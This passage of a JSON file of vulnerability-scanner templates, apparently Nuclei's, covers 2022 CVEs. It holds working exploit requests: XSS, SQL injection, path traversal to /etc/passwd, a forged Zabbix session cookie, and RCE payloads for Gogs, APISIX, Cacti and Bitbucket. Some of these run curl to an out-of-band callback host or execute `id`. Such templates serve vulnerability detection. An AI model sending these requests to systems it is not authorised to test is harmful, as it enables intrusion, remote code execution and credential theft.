WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-25568","info":{"name":"MotionEye Config Info Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["upload_password","network_password"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-27043","info":{"name":"Yearning - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd","{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body) || contains_all(body, '[fonts]', 'for 16-bit app support')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-24627","info":{"name":"AudioCodes Device Manager Express - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"audiocodes</title>\")"],"internal":true}]},{"raw":["POST /admin/AudioCodes_files/process_login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=&domain=&p=%5C%27or+1%3D1%23\n"],"matchers":[{"type":"word","part":"body","words":["SQL syntax","mysql_fetch","You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1580","info":{"name":"Site Offline WP Plugin < 1.5.3 - Authorization Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["Site Offline Or Coming Soon Or Maintenance Mode"]}]},{"method":"GET","path":["{{BaseURL}}/?admin"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"wp-block\", \"author\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site 